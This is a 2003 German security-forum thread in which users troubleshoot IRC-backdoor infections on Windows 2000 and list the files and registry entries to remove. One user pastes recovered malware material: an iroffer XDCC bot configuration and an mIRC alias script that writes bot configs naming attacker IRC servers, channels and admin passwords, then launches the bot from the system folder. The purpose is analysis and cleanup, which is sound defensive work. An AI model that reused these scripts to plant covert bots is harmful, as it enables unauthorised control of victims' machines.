Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   IRC Trojaner (https://www.trojaner-board.de/747-irc-trojaner.html)

Peter999 22.02.2003 09:37

Hallo,

Ich habe ein Trojaner-Problem
Mein Virus-Scanner (Norton Anti-Virus) meldete mir nen IRC TROJAN unter c:\winnt\system32\incs.bat. Ich habe daraufhin incs.bat gelöscht (war vielleicht nicht so günstig? ). Die Sache scheint aber nicht erledigt zu sein. Jedesmal wenn ich mein System (Win2000) boote, startet nach dem Start eine Anwendung "Update", die sich offensichtlich zu nem IRC-Server verbinden will, der zugehörige Prozess ist explorer.exe. Kann mir jemand nen Tipp geben, wie ich hier weiterverfahren soll?

Danke
Peter999

Lucky 22.02.2003 09:39

Lade dir mal TrojanHunter runter und lasse den über dein System laufen. Und sag uns dann am besten mal welcher Trojaner gefunden wird. www.trojanhunter.com

Gorgo 22.02.2003 10:06

Trojan.IRC.KarmaHotel

This trojan program consists of two scripts in HTML file. When an infected HTML page is opened, the VBS part of trojan is written to disk.
The VBS part, in turn, creates another part (INI file), finds and modifies the initialization file of mIRC client, so that it allows mIRC client to respond to remote commands issued by other users, and turns off all Mirc warnings.
Then mIRC is given a special initialization file that allows others to control the infected PC, download and upload files to it, read private messages in Mirc, etc.
© Kaspersky Lab

Peter999 22.02.2003 12:26

Danke erstmal, also, der Trojan Hunter hat nichts gefunden außer ein paar Warnings wegen Files mit Double Extension.... ich hab mit dem Norton alle beteiligten Files entfernen lassen, aber dennoch, jedesmal wenn ich das System starte, startet "Update" - mittlerweile habe ich irc deinstalliert.

Ich habe in einem Forum, wo man Attachments anfügen kann, einen Screenshot ausgestellt. Vielleicht sagt euch das was? http://www.rollenspiele-undmehr.de/viewtopic.php?t=2425

LittleDevil 04.03.2003 18:30

den selben scheiss hab ich auch seit ein paar wochen. werde immer wieder von viren attackiert. bei mir öfftet sich das selbe fenster, wie bei dir. habe auch alles gelöscht, aber es kommt immer wieder. VERDAMMT [img]graemlins/kloppen.gif[/img]

hoffe du hast abhilfe [img]graemlins/balla.gif[/img]

bye!

CyberFred 04.03.2003 18:49

Dann ladet euch mal ne Testversion von KAV runter scannt damit euer System, Vieleicht findet der ja was.

ciao

P.S. Ansonsten mal mit Trojancheck 6 die Registry Run-Sektionen nach komisch aussehenden Dateien abklappern [img]graemlins/daumenhoch.gif[/img]

LittleDevil 04.03.2003 20:08

is keiner druff. hmmm... :confused:

AUGUST 15.03.2003 04:19

um zu deinen Problem zu kommen ich habe auch seit einiger zeit ca. 2 Wochen einige Probs IRC Trojanern gehabt mein Antivirustool schlug Ständig an es entfernte die infizierten Dateien und nach einiger Zeit bekamm Ich Wieder eine Meldung das der gleiche Trojaner auf meinem system shon wieder vorhanden sei es handelte sich dabei um die Trojaner

Backdoor.IRC.Zcrew
Backdoor.Sdbot
Downloader.Trojan
Backdoor.Dvldr
W32.HLLW.Deloder

nachdem ich das System mit 3 Verschiedenen Antivirus Programmen durchsucht habe und es immernoch zu den meldungen gekommen war versuchte ich es mit einigen Anti-Trojaner Programmen die versuche scheiterten jedoch daran das die Folgen zwar angezeigt wurden jedoch die ursachen nicht behoben

Also machte ich mich selbst auf die suche nach dem Verursacher
und Dabei entdeckte ich in meinem wIN2000 Verzeichnissen Verschiedene Infizierte Dateien
welche ich manuell in Quarantine gesteckt hatte dann machte ich mich auf mir die Ports mal genauer anzusehen und dabei entdeckte ich 2 dateien welche ports geöffnet hielten es handelte sich dabei um die ports 6667 und den port 445

es hat mich 2 Tage gekostet bis ich mein ganzes System durchforstet hatte und alle Dateien enndlich entfernen konnte welche das ganze Verursacht haben

hier möchte ich die Verzeichnisse mit den Dateien nennen die dabei entdeckt wurden

1 Verzeichnis

C:\WINNT\system32

Libparse.exe
coldbot.exe
77463279.INS
37224256.INS
86102025.INS
46602466.INS
7058408.INS
wget.exe
reader.w
kill.exe
moo.dll
servers.ini
crs32.dll
rconnect.conf
remote.ini
PipeCmdSrv.exe
stde9.bat
eleet.exe
bootdrv.dll
psexec.exe
web.swf
explore.DAT
CRS.EXE
svchost32.exe
rconnect.log
dms.exe
crs32.old
a.a
STDE9.exe
soulja.exe
Km.a
regsvc32.exe
fControl.a
IfControl.a
Sa.exe
zxtt.exe
incs.bat
inst.exe
sb.bat
sh.bat
rb.bat

2 Verzeichnis

C:\WINNT\Web\printers\images

ipp_0003.gif
ipp_0005.gif
hidden32.exe
svchost32.exe
boywonder.dat
Libparse.exe
psexec.exe
commands.txt
navdb.dbx
win32.vxd
wget.exe
eleet.exe
explore.DAT
regkeyadd.reg
bootdrv.dll
server.txt
moo.dll

3 Verzeichnis

C:\WINNT\win32

kill.exe
abc.dll
a.dll
b.dll
identd.exe
attrib.exe
moo.dll
abc2.dll
remote.ini
ntsys.exe.tc3

4 Verzeichnis Das Verzeichniss ist ein Windows Standardverzeichnis wo allerdings diese Dateien nichts drin Verloren haben

C:\WINNT\Fonts

AImIRC.ini
STDE9.exe
Explorer.exe
rundll32.exe
bootdrv.dll
Libparse.exe
r.ini
rconnect.log

5 Verzeichnis

C:\WINNT\system32\fsys

rconnect.log
svchost32.exe
web.swf

6 Verzeichnis

C:\WINNT\system32\www

MDX.DLL
moo.dll
VIEWS.MDX
webserv.mrc

so jetzt Müsste ich alle aufgezählt haben hoffe das der eine oder andere von euch dadurch ein paar lästige zeitgenossen loswerden kann auf jeden fall sollte man nicht vergessen noch die autostart einträge wegzulöschen an welche ihr gelangt in dem ihr auf Start/ Ausführen dann regedit eintippt danach sucht ihr nach dem verzeichnissen

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

und löscht dort die einträge zu den obengenannten dateien falls vorhanden

Viele Grüsse von August euren neuen member im Board :)

p.s bevor ich es vergesse für alle die es interesiert wie diese dateien aufgebaut sind die .bat dateien könnt ihr euch mit dem editor ansehen

zudem kann man mit winrar in die datei eleet.exe und noch einige andere hineinsehen da es selbstextrahierende Dateien sind ihr werdet dort auch noch einige zusätzliche infos dazu finden zb wohin die dateien entpoackt werden und woraus sie bestehen eine kleine suche in einigen suchmascheienen dürfte dann genau aufklären wozu diese dateien da sind

mmk 15.03.2003 10:33

Hallo,

willkommen im Trojaner-Board!

</font><blockquote>Zitat:</font><hr />Original erstellt von AUGUST:
um zu deinen Problem zu kommen ich habe auch seit einiger zeit ca. 2 Wochen einige Probs IRC Trojanern gehabt</font>[/QUOTE]Mein lieber August ;) , das ist aber eine Liste, die fast ihresgleichen sucht. Besorge dir mal einen vernünftigen AV-/Trojanerschutz - wenn sich all das bei laufendem Hintergrundscanner installieren ließ... ei, ei, ei.

Und vor allem: Starte keine _ausführbaren_ Dateien aus unseriösen Quellen wie eben Dateitauschbörsen!

Hier geht's zum AV-Scanner:
http://datsec.de/frame.asp?b=b5&p=p2

mmk 15.03.2003 10:36

@Peter999

Es handelte sich um diesen Wurm:
http://www.viruslist.com/eng/viruslist.html?id=59741

AUGUST 15.03.2003 14:24

Hallo mmk

Es ist ja nicht so das meine Antivirenprogramme nichts gesagt hätten sondern das sie es zwar gemeldet haben jedoch die ursachen nicht behoben haben zumindest die standardeinträge wie es sie bei allen namenhaften herstellern von Antivirussoftware zu dem Trojaner zu sehen gibt waren nicht vorhanden statdessen alle in abgeänderten formen

und ein hintergrundwächter würde mir auch nur die änderungen in der Registry aufzeigen das waren gerade mal 2 Einträge allerdings die kettenreaktion welche diese verursachen ist fenomenal und gut gescriptet was die installation des ganzen betrifft so stell dir vor sind nur 2 dateien für alle diese Dateinamen die ich oben genannt habe verantwortlich in denen alles schön sauber verpackt gewesen ist

nach den entpacken der dateien haben die restlichen scripte wie zb für das iroffer und das mybot xdcc usw. den rest erledigt den download die anderen dateien

Übrigens die Antivirenprogramme waren Norton Antivirus Prof 2003 /PCillin 2003/MC AFFEE

Werde auch mal einige andere Testen falls jemand noch eine gute Idee hat

AUGUST 15.03.2003 19:58

So KAV habe ich nun auch noch 2 mal über den PC laufen lassen und er konnte auch nichts entdecken habe den Norton wieder drauf und siehe da bekomme eine meldung das er eine datei gefunden hat es handelt sich dabei wieder um die im verzeichniss anbelegte C:\WINNT\System32\inst.exe Datei verbringe jetzt shon fast den ganzen tag Daran nach den verursacher im system zu suchen anscheinend reproduziert sich die Datei immernoch selbst in der Registry finde ich auch keinen verweis auf die datei irgendwo muss noch eine befehlszeile auf dem PC liegen welche zuständig ist die Datei zu reproduzieren vieleicht hat ja jemand noch eine idee wonach man auschau halten könnte eine verbindung nach draussen besteht nicht mehr nur noch das was ich auch erlaube es muss irgendwo von innen kommen aus einer .bat oder änlichen datei

Mfg AUGUST

mmk 15.03.2003 20:17

Hallo,

nutze bitte Trojancheck 6 ( http://trojancheck.de ), und poste hier dann den Bericht über die Registry-Einträge sowie alle laufenden Prozesse.

Cassandra 15.03.2003 20:18

@AUGUST: Guckst Du hier .

Gruß,
Cassandra

AUGUST 15.03.2003 22:52

Hallo mmk
habe mir jetzt ein neues Prog mal gesaugt was eventuell aufschluss über die anwendungen im Hintergrund liefern wird es handelt sich dabei um REGRUN Control Center bin ganz zuversichtlich das ich noch das Fehlende teilchen des Puzzels herausfinden werde den zumindest nach aussen geht nichts mehr es ist jetzt nur noch eine Reproduktionsache innerhalb des Netzwerkes allerding schlagen die Antivir sofort Alarm sobald sich die Datei die inst.exe in ihre Ordner entpacken will Norton erkennt es als Backdoor.Dvldr an jetzt muss ich nur noch herausfinden welche Datei und in welchen fällen versucht wird den Trojaner zu installieren es kommt aber mit 99% sicherheit irgendwo aus dem internen netzwerk

Danke auch an dich Cassandra der Link hatte mich auf eine Idee gebracht habe alle anderen PCS in meinen Netzwerk überprüft auf die gleichen Dateien und Infektionen weil die Vermutung nahe lag das eventuell innerhalb des Netzwerkes sich der Trojaner Regeneriert allerdings erfolglos

falls jemand interesse haben sollte mal zu sehen wie solch eine befehlsdatei des trojaners ausieht würde ich einiges Posten was ich hier herausgefunden habe bei meinen nachforschungen

Mfg. August

Cassandra 16.03.2003 12:37

Jo, gerne, jeder Zeit! Man lernt ja gerne dazu [img]smile.gif[/img]

Du könntest alternativ (sofern noch vorhanden) auch mal die betreffenden Dateien an meine E-Mail-Adresse schicken (steht im Profil), dann kann ich selber mal schauen. Außerdem würde der Kandidat noch in meiner Sammlung fehlen. Wäre jedenfalls nett von Dir [img]smile.gif[/img] .

Gruß,
Cassandra

AUGUST 16.03.2003 16:24

Die Dateien habe ich noch ich schicke dir die Interesantessten mal rüber
Die Standardsachen wie den getarnten VNC clienten lasse ich dabei mal weg

hier noch ein kleiner auszug davon wie so nen script ausehen kann

Mybot2 Datei sieht so aus mit den dazugehörigen angaben zum channel und sen pass des angreifers so wie seinen usernamen

xdccfile mybot2.xdcc
pidfile mybot2.pid
logstats no
logrotate none
ignorefile mybot2.ignl
connectionmethod direct
server 213.77.3.205 6667
channel #XDCC-SHAKEL -plist 5
user_nick [Xdcc][a2]072727o
user_realname 8,14-=[Baa]=- Xdcc
user_modes +i
virthost no
vhost_ip virtip.domain.com
firewall no
dccrangestart 4000
loginname Loads2
slotsmax 5
queuesize 5
slotsmaxpack 5
slotsmaxslots 5
slotsmaxqueue 20
maxtransfersperperson 2
maxqueueditemsperperson 2
filedir /winnt/system32/download
restrictlist yes
restrictsend yes
overallminspeed
transfermaxspeed
overallmaxspeed 0
overallmaxspeeddayspeed 0
overallmaxspeeddaytime 0
overallmaxspeeddaydays MTWRF
debug no
autosend no
autoword blah
automsg blah
autopack 1
xdccautosavetime 30
creditline 1Brought To You By 4Loads1.
adminpass ROmazt.MMB89s
adminhost *@*
adminhost *@*
uploadallowed yes
uploaddir /WINNT/system32/download
uploadmaxsize 1900

Als nächstes das Aliasses script auch ganz interesannt

[aliases]
n0=CreateBot {
n1= //run $mircdir\kill.exe iroffer.exe
n2= /set %xdcc.nick [Wz][IB]xdcc $+ $rand(10,100000)
n3= /timer 1 2 /CreateBot2
n4=}
n5=CreateBot2 {
n6= /remove c:\winnt\system32\mybot.txt
n7= /write c:\winnt\system32\mybot.txt xdccfile mybot.xdcc
n8= /write c:\winnt\system32\mybot.txt pidfile mybot.pid
n9= /write c:\winnt\system32\mybot.txt logstats no
n10= /write c:\winnt\system32\mybot.txt logrotate none
n11= /write c:\winnt\system32\mybot.txt ignorefile mybot.ignl
n12= /write c:\winnt\system32\mybot.txt connectionmethod direct
n13= /write c:\winnt\system32\mybot.txt server 192.114.144.67 9898
n14= /write c:\winnt\system32\mybot.txt channel #warezone -plist 5
n15= /write c:\winnt\system32\mybot.txt channel #ICQ^BOY -plist 5
n16= /write c:\winnt\system32\mybot.txt user_nick %xdcc.nick
n17= /write c:\winnt\system32\mybot.txt user_realname 9,14-=[ICQ^BOY's]=- Xdcc
n18= /write c:\winnt\system32\mybot.txt user_modes +i
n19= /write c:\winnt\system32\mybot.txt virthost no
n20= /write c:\winnt\system32\mybot.txt vhost_ip virtip.domain.com
n21= /write c:\winnt\system32\mybot.txt firewall no
n22= /write c:\winnt\system32\mybot.txt dccrangestart 4000
n23= /write c:\winnt\system32\mybot.txt loginname W-M
n24= /write c:\winnt\system32\mybot.txt slotsmax 5
n25= /write c:\winnt\system32\mybot.txt queuesize 5
n26= /write c:\winnt\system32\mybot.txt slotsmaxpack 5
n27= /write c:\winnt\system32\mybot.txt slotsmaxslots 5
n28= /write c:\winnt\system32\mybot.txt slotsmaxqueue 20
n29= /write c:\winnt\system32\mybot.txt maxtransfersperperson 2
n30= /write c:\winnt\system32\mybot.txt maxqueueditemsperperson 2
n31= /write c:\winnt\system32\mybot.txt filedir /winnt/system32/download
n32= /write c:\winnt\system32\mybot.txt restrictlist yes
n33= /write c:\winnt\system32\mybot.txt restrictsend yes
n34= /write c:\winnt\system32\mybot.txt overallminspeed
n35= /write c:\winnt\system32\mybot.txt transfermaxspeed
n36= /write c:\winnt\system32\mybot.txt overallmaxspeed 0
n37= /write c:\winnt\system32\mybot.txt overallmaxspeeddayspeed 0
n38= /write c:\winnt\system32\mybot.txt overallmaxspeeddaytime 0
n39= /write c:\winnt\system32\mybot.txt overallmaxspeeddaydays MTWRF
n40= /write c:\winnt\system32\mybot.txt debug no
n41= /write c:\winnt\system32\mybot.txt autosend no
n42= /write c:\winnt\system32\mybot.txt autoword blah
n43= /write c:\winnt\system32\mybot.txt automsg blah
n44= /write c:\winnt\system32\mybot.txt autopack 1
n45= /write c:\winnt\system32\mybot.txt xdccautosavetime 30
n46= /write c:\winnt\system32\mybot.txt creditline 1Brought To You By 12ICQ^BOY1.
n47= /write c:\winnt\system32\mybot.txt adminpass C20I8z76CaUCo
n48= /write c:\winnt\system32\mybot.txt adminhost ICQ^BOY*!*@*
n49= /write c:\winnt\system32\mybot.txt uploadallowed yes
n50= /write c:\winnt\system32\mybot.txt uploaddir /WINNT/system32/download
n51= /write c:\winnt\system32\mybot.txt uploadmaxsize 1900
n52= /timer 1 2 //run $mircdir\iroffer.exe mybot.txt
n53=}
n54=CreateBota {
n55= //run $mircdir\kill.exe iroffer.exe
n56= /set %xdcc.nick2 [Wz][IB]xdcc $+ $rand(10,100000)
n57= /timer 1 2 /CreateBota2
n58=}
n59=CreateBota2 {
n60= /remove c:\winnt\system32\mybot2.txt
n61= /write c:\winnt\system32\mybot2.txt xdccfile mybot2.xdcc
n62= /write c:\winnt\system32\mybot2.txt pidfile mybot2.pid
n63= /write c:\winnt\system32\mybot2.txt logstats no
n64= /write c:\winnt\system32\mybot2.txt logrotate none
n65= /write c:\winnt\system32\mybot2.txt ignorefile mybot2.ignl
n66= /write c:\winnt\system32\mybot2.txt connectionmethod direct
n67= /write c:\winnt\system32\mybot2.txt server mission.irc.co.il 6667
n68= /write c:\winnt\system32\mybot2.txt channel #ICQ^BOY -plist 5
n69= /write c:\winnt\system32\mybot2.txt channel #Warezone -plist 5
n70= /write c:\winnt\system32\mybot2.txt user_nick %xdcc.nick2
n71= /write c:\winnt\system32\mybot2.txt user_realname 9,14-=[ICQ^BOY's]=- Xdcc
n72= /write c:\winnt\system32\mybot2.txt user_modes +i
n73= /write c:\winnt\system32\mybot2.txt virthost no
n74= /write c:\winnt\system32\mybot2.txt vhost_ip virtip.domain.com
n75= /write c:\winnt\system32\mybot2.txt firewall no
n76= /write c:\winnt\system32\mybot2.txt dccrangestart 4000
n77= /write c:\winnt\system32\mybot2.txt loginname w-m
n78= /write c:\winnt\system32\mybot2.txt slotsmax 5
n79= /write c:\winnt\system32\mybot2.txt queuesize 5
n80= /write c:\winnt\system32\mybot2.txt slotsmaxpack 5
n81= /write c:\winnt\system32\mybot2.txt slotsmaxslots 5
n82= /write c:\winnt\system32\mybot2.txt slotsmaxqueue 20
n83= /write c:\winnt\system32\mybot2.txt maxtransfersperperson 2
n84= /write c:\winnt\system32\mybot2.txt maxqueueditemsperperson 2
n85= /write c:\winnt\system32\mybot2.txt filedir /winnt/system32/download
n86= /write c:\winnt\system32\mybot2.txt restrictlist yes
n87= /write c:\winnt\system32\mybot2.txt restrictsend yes
n88= /write c:\winnt\system32\mybot2.txt overallminspeed
n89= /write c:\winnt\system32\mybot2.txt transfermaxspeed
n90= /write c:\winnt\system32\mybot2.txt overallmaxspeed 0
n91= /write c:\winnt\system32\mybot2.txt overallmaxspeeddayspeed 0
n92= /write c:\winnt\system32\mybot2.txt overallmaxspeeddaytime 0
n93= /write c:\winnt\system32\mybot2.txt overallmaxspeeddaydays MTWRF
n94= /write c:\winnt\system32\mybot2.txt debug no
n95= /write c:\winnt\system32\mybot2.txt autosend no
n96= /write c:\winnt\system32\mybot2.txt autoword blah
n97= /write c:\winnt\system32\mybot2.txt automsg blah
n98= /write c:\winnt\system32\mybot2.txt autopack 1
n99= /write c:\winnt\system32\mybot2.txt xdccautosavetime 30
n100= /write c:\winnt\system32\mybot2.txt creditline 1Brought To You By 12ICQ^BOY's1.
n101= /write c:\winnt\system32\mybot2.txt adminpass C20I8z76CaUCo
n102= /write c:\winnt\system32\mybot2.txt adminhost ICQ^BOY*!*@*
n103= /write c:\winnt\system32\mybot2.txt uploadallowed yes
n104= /write c:\winnt\system32\mybot2.txt uploaddir /WINNT/system32/download
n105= /write c:\winnt\system32\mybot2.txt uploadmaxsize 1900
n106= /timer 1 2 //run $mircdir\iroffer.exe mybot2.txt
n107=}

hoffe ein wenig einblich darüber gegeben zu haben was sich hinter solch einen trojaner verbirgt es sind da noch sehr viele dateien vorhanden die dazugehören allerdings würde es den rahmen des Boards Sprengen alle hier aufzulisten

Mfg. AUGUST

AUGUST 16.03.2003 22:51

So wollte nur mal melden das mein problem nun gelöst ist mit den zahlreichen IRC Trojanern
bedanke mich für eure antworten und Tips

zudem habe ich sehr viel hintergrundwissen über diese Dateien und deren aufbau gewonnen durch persönliche nachforschungen also wer zu IRC trojanern etwas wissen möchte oder deren Funktion und wo sie auf den System zu finden sind kann mir gerne ne PM schicken ich versuche ihn dann zu helfen bei der Entfernung wer sonst noch fragen haben sollte zu den von mir aufgeführten IRC Ptotocollen und was die nun bedeuten kann sich auch gerne melden

Zu einigen Dateien welche ich entdeckt habe existiert im netz noch nichts und man findet auch keine hinweise auf solche auf Antivirenseiten was sich jedoch ändern wird Symantec hate Interesse an den Dateien und wird Sie auch im nächsten Virendefinitionsupdate aufnehmen

ein kleiner auszug für euch worauf ihr achten soltet die bislang unbekannten dateien sind in den ordner

C:\WINNT\System32 zu finden und heissen

Dms.exe
eleet.exe

beide Dateien beinhalten IRC Trojaner also vorsicht bei wenn ihr diese beiden Dateien in euren System verzeichniss finden soltet

Viele nette grüsse und einen guten start in die neue woche wünscht euch AUGUST

AUGUST 17.03.2003 03:06

so noch mehr erkentnisse dank n_dot_force der mich noch auf eine idee gebracht hat wie bei sub seven legen diese trojaner zb für den vnc server der zuvor als zb. explorer exe getarnt wird noch einige registryeintragungen fest hier habe ich noch ein paar die ich dazu gefunden habe

Wenn Sie diesen Eintrag löschen, werden folgende Schlüssel gelöscht
HKEY_CURRENT_USER\Software\Orl\VNCHooks\Application_Prefs
HKEY_CURRENT_USER\Software\Orl\VNCHooks
HKEY_CURRENT_USER\Software\Orl\WinVNC3
HKEY_LOCAL_MACHINE\Software\Orl\WinVNC3\Default
HKEY_LOCAL_MACHINE\Software\Orl\WinVNC3
HKEY_CURRENT_USER\Software\Orl\VNCHooks\Application_Prefs
HKEY_CURRENT_USER\Software\Orl\VNCHooks

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU\

enthält

000 = Rcfg.ini
001 = Sencs.bat
002 = obcd
003 = albun
004 = Vnc
005 = orl

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU

enthält

000 = albun

AUGUST 17.03.2003 16:11

Nachtrag
was noch so in der Registry gefunden wurde

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}

000 = PSEXESVC.EXE
001 = winmgmt.exe
002 = wingmt.exe
003 = IR.conf
004 = rb.bat
005 = dwldr32
006 = taskman
007 = svchost32.exe
008 = secure.bat
009 = start.bat
010 = rconnect
011 = explore.dat
012 = bootdrv.dll
013 = activex.ocx
014 = cygwin1.dll
015 = psexec.exe
016 = omnithread_rt.dll
017 = 32dllemu.txt
018 = LSASS.exe
019 = Services.exe
020 = SVhost.exe
021 = Dtceindll32.dll
022 = QoSServer.dll
023 = .dcba

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU

000 = Xdcc

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xdcc
Application NOTEPAD.EXE

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSEXESVC

- Standard
- DisplayName (PSEXESVC)
- ErrorControl ist 1
- ImagePath (%SystemRoot%\System32\PSEXESVC.EXE)
- ObjectName (LocalSystem)
- Start (4)
- Type (10)

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\PSEXESVC

- Standard
- DisplayName (PSEXESVC)
- ErrorControl ist 1
- ImagePath (%SystemRoot%\System32\PSEXESVC.EXE)
- ObjectName (LocalSystem)
- Start (4)
- Type (10)

HKEY_CLASSES_ROOT\AppID\winmgmt.exe

- AppId ( {8BC3F05E-D86B-11D0-A075-00C04FB68820} )

HKEY_CLASSES_ROOT\AppID\WinMgmt

- AppId ({74864DA1-0630-11D0-A5B6-00AA00680C3F} )
-------------------------------------------------------------------------------------------
HKEY_CLASSES_ROOT\CLSID\{74864DA1-0630-11D0-A5B6-00AA00680C3F}

- Standard Microsoft WBEM Server
- AppId {74864DA1-0630-11D0-A5B6-00AA00680C3F}
- LocalService WinMgmt
- ThreadingModel Both

HKEY_CLASSES_ROOT\CLSID\{74864DA1-0630-11D0-A5B6-00AA00680C3F}\LocalServer32

- Standard (C:\WINNT\System32\WBEM\winmgmt.exe)
- ThreadingModel (Both)

--------------------------------------------------------------------------------------------

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{74864DA1-0630-11D0-A5B6-00AA00680C3F}

- Standard winmgmt.exe
- LocalService WinMgmt

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinMgmt

- ImagePath %SystemRoot%\System32\WBEM\WinMgmt.exe
- ObjectName LocalSystem
- Start 2
- Type 10
- Failure Action

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\WinMgmt
- ImagePath %SystemRoot%\System32\WBEM\WinMgmt.exe
- ObjectName LocalSystem
- Start 2
- Type 10
- Failure Action

einiges davon gehört noch zu den Trojaner

Mfg.August

outlook 17.08.2005 12:41

I must admit to being more impressed for it. I've even recommended it to all my friends outlook express messages disappear dbx reader


Alle Zeitangaben in WEZ +1. Es ist jetzt 10:13 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131